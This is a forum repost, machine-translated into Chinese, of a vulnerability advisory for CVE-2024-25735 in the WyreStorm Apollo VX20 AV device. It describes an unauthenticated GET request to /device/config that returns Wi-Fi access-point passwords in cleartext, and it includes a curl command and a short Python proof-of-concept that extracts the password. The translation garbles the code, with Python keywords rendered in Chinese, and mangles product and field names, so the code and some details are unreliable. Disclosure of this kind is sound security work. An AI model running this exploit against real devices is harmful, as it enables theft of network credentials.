H

Wystorm Apollo VX20 1.3.58-不正确的访问控制“凭据披露”

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
[+] Credits: John Page(又名Hyp3rlinx)
[+]网站: hyp3rlinx.altervista.org
[+]源: http://hyp3rlinx.altervista.org/ADV...NTROL_CREDENTER_DISCLOSICE_CVE-2024-25735.TXT
[+] twitter.com/hyp3rlinx
[+] ISR: Aptaritionsec
[小贩]
www.wyrestorm.com
[产品]
Apollo VX20 1.3.58
[漏洞类型]
不正确的访问控制(凭证披露)
[受影响的组件]
Web界面,配置
[受影响的产品代码库]
Apollo VX20 1.3.58,固定在v1.3.58中
[CVE参考]
CVE-2024-25735
[安全问题]
1.3.58之前,在Wystorm Apollo VX20设备上发现了一个问题。
远程攻击者可以使用HTTP GET请求发现SoftAp(接入点)路由器/设备/配置的clearText凭据。
然后在HTTP响应中返回凭证。 curl -K https://192.168.x.x/device/config
例如。 HTTP响应STEMPET:
: {'enable':'y','oncmd':'8004','offCMD':'8036'}},'screen':'duual' ,'ipconflict':'y','wifi': {'auto':'y','band':'5','channel':'153'}
,'softap': {'password':'12345678','路由器:'y','softap':'y'} .
[漏洞/POC]
导入请求
target='https://x.x.x.x'
res=requests.get(target+'/device/config',verify=false)
idx=res.content.find('{'password':')
如果IDX!=-1:
idx2=res.content.find('路由器')
如果IDX2!=-1:
打印('[+] CVE-2024-25735凭据披露')
打印('[ +]' + res.Content [IDX + 1:IDX2 + 11])
打印('[+] hyp3rlinx')
其他:
print('[!] Apollo VX20设备不脆弱.')
[网络访问]
偏僻的
[严重性]
高的
[披露时间表]
供应商Notification: 2024年1月18日
供应商发布了固定固件v1.3.583360 2024年2月2日
2024年2月11日:公共披露
[+]免责声明
本建议中包含的信息“按原样”提供,没有任何使用或其他情况的保证或保证。
特此授予此建议的重新分配,只要除了对其进行改革,没有对其进行更改,并且
给予应有的信用。如果适当的信用
被给予作者。作者对此处包含的信息概不负责,并且接受不责任
对于使用或滥用此信息造成的任何损害。作者禁止任何恶意使用与安全有关的信息
或作者或其他地方的利用。所有内容(c)。
HYP3RLINX
 
后退
顶部